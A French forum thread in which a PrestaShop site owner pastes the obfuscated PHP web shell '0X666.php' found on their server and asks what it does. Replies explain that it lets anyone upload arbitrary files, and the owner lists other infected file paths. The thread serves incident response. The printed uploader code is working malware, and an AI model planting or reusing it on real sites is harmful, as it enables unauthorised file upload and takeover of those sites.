hack 0X666.php consequences ?

[stephabcde]

Bonjour,

J'ai été infecté par 0X666.php

Ma connaissance en PHP étant quelque peu limitée (voire nulle !), y a t il une ame charitable qui peut m'expliquer simplement les conséquences du code ci dessous ?

Merci d'avance,

<?php gotodFruf;
PxDxi:
    if ($files["name"] != '') {
        $fullpath = $_REQUEST["path"] . $files["name"];
        if (move_uploaded_file($files["tmp_name"], $fullpath)) {
            echo "<h1><a href='{$fullpath}'>OK-Click here!</a></h1>";
        }
    }
    gotoI_rY1;
    WYWqj:
        $files = @$_FILES["files"];
        gotoPxDxi;
        dFruf:
            echo "kill_the_net";
            gotoWYWqj;
            I_rY1:
                echo "<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart / form - data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>

 

Edited January 11, 2020 by stephabcde (see edit history)

[Eolia]

Supprimez les répertoires /vendor/phpunit/ de tous les modules où il se trouve.

Là le hack permet d'envoyer n'importe quel fichier sur votre ftp.

 

Voir ce post 

 

 

[stephabcde]

Bonjour,

Merci pour votre réponse

oui tout cela est fait

Je voulais juste savoir ce que faisait 0x666.php

Je suis en train de vérifier s'il y a des fichiers inconnus qui ont été envoyés (pas simple car par facile de savoir depuis quand je suis contaminé ...)

[stephabcde]

Pour info et si cela peut servir à certains d'entre vous (pas forcément utile car lié à nos sites,  mais cela n'est pas très compliqué d'aller y jeter un oeil ...):

 

Prestashop 1.6.1.24

Fichiers infectés (et/ou créés) dans le dossier

racine/pdf/invoice.php

racine/js/jquery/loader.php

racine/js/admin/login.php

racine/licence.php

Nous continuons les investigations et recherchons d'autres modifs